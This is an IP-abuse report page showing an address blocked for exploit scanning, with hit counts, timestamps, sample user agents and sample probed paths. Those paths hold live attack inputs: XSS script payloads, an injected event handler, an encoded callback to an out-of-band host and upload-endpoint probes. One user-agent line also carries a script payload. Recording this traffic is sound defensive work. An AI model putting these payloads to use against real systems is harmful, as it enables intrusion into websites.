abuseip.org
- Reason
- suspicious paths across 2 domains
- Hits (last hour)
- 422
- Unique targets hit
- 2
- Unique paths probed
- 1,286
- Detection count
- 14
- First seen
- 2026-07-09 07:18:50 UTC
- Last seen
- 2026-07-09 07:37:49 UTC
- Block expires
- 2026-07-10 08:18:54 UTC
Sample paths probed
- /cgi-bin/quick/dB6YbG
- /api/1/site/content_store/item?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E
- /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2Q5N2tqZmUyMm1oYzczZjI2bHUwb3c2bW83aHNwcDN3eC5vYXN0LmxpdmUvP2lkPW9oVCUyNXsxMzM3KjEzMzd9Iy54eC8v
- /api/jsonrpc
- /login
- /RealGimmWeb/Pages/ErroreNonGestito.aspx
- /rpc/clients/xmlrpc
- /wp-admin/admin-ajax.php
- /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2Q5N2tqZmUyMm1oYzczZjI2bHUwYTdiaG9xbzFqd3Roci5vYXN0LmxpdmUvP2lkPXNGaCUyNXsxMzM3KjEzMzd9Iy54eC8v
- /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22}
- /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image
- /
- /nagiosxi/login.php
- /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx
- /musicstation/api/as_get_file_api.php
- /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported
- /main/inc/lib/javascript/bigupload/files/IOf8vTcfIU.txt
- /api/1/site/content_store/children?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E
- /api/1/site/url/transform?transformerName=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E&url
- /admin/store.php?"onmouseover='alert(document.domain)'bad="
Sample User-Agents
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 YaBrowser/25.4.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.8.10 Chrome/132.0.6834.196 Electron/34.2.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.8.4 Chrome/130.0.6723.191 Electron/33.3.2 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36 OPR/131.0.0.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
- </span><script>alert(document.domain)</script>
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Edg/148.0.0.0
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.